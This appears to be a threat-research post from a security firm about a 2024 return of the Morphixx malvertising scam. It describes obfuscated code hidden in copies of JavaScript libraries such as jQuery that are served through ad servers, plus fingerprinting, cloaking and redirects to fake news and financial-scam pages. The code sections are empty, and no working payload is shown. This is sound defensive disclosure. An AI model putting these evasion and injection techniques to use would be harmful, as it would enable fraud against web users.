Security researchers at GeoEdge have uncovered a resurgence of the Morphixx malvertising credit card scam in early September 2024, now using a new and deceptive attack vector. In the latest attack, threat actors target mobile users in the UK and Germany with embedded malicious code within popular JavaScript libraries like TweenMax, jQuery, Edge, CSSPlugin, TweenLite, and GSAP. By Leveraging the trusted reputation of Google Ad services and legit libraries, the attacker inserted the malicious script and increased the effectiveness of evading detection.
These libraries, commonly used for animations, interactivity, and enhanced web experiences, have been exploited to disguise the scam’s activities, making detection more challenging. Traditional deceptive campaigns use client-side cloakers in the post-click stage to control the display of the deceptive landing page and cloak it in case the campaign served in non-human environments. Morphixx placed the fingerprinting script in the banner pre-loading stage, controlling the display of both the banner and the landing page.
Here’s where the latest attack begins:
Flow of the Attack
- Ad Request The publisher’s page initiates a network request to retrieve ad resources from the Google Ad Server, including legitimate libraries like jQuery.js.
- Ad Response The server returns the ad content.
Within the jQuery.js file, hidden obfuscated malicious code is embedded. - Rendering and Fingerprint The browser renders the fake ad and executes the embedded malicious script, which includes client-side fingerprinting to filter out bots and target specific audiences. The following stages only affect targeted users.
- Misleading Malicious Request For targeted users, the browser makes a network request to a seemingly legitimate JavaScript library, but this time from a malicious domain.
- Ad Cloaking The returned script, an obfuscated malicious code, replaces the fake ad with a financial scam ad. Clicking on this malicious ad redirects the user to a cloaker domain, which disguises its true malicious intent by using server-side fingerprint to deliver different content, specifically tailored to accurately target user profiles.
Below is an example for the seemingly legitimate request for the popular JavaScript library ‘jQuery.js’ from the Google Ad Server, along with the manipulated response containing the hidden threat.
The Request:
The Response:
Start Code:
Malicious Code Between:
End Code:
Examples of Fake and Malicious Ads:
Example 1:
Fake and Malicious Ad:
Clicking on the Fake Ad leads to:
Clicking on the Malicious Ad leads to:
Example 2:
Clicking on the Fake Ad leads to:
Clicking on the Malicious Ad:
Example 3:
Clicking on the Fake Ad leads to:
Clicking on the Malicious Ad leads to a Cloaker:
Fake BBC Website vs Real BBC:
The attack employed a range of sophisticated techniques to evade detection and maximize its impact. These techniques include:
- Obfuscation
- Anti-Debug Functions
- Client-Side Fingerprint
- Server-Side Fingerprint
- Cloaked Content
- Dynamic Content Loading
- Code injection
- Malicious Redirects
Content updated on Sept 5, 2024. Read past research on Morphixx here.
